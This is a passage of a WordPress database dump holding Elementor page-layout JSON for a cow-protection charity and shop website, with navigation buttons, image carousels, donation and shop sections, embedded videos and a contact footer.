FFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11580,1923,'_elementor_page_assets','a:0:{}'),(11583,1924,'_elementor_edit_mode','builder'),(11584,1924,'_elementor_template_type','wp-page'),(11585,1924,'_elementor_version','3.7.8'),(11586,1924,'_wp_page_template','elementor_canvas'),(11587,1924,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11588,1924,'_elementor_page_assets','a:0:{}'),(11590,1925,'_elementor_edit_mode','builder'),(11591,1925,'_elementor_template_type','wp-page'),(11592,1925,'_elementor_version','3.7.8'),(11593,1925,'_wp_page_template','elementor_canvas'),(11594,1925,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elTy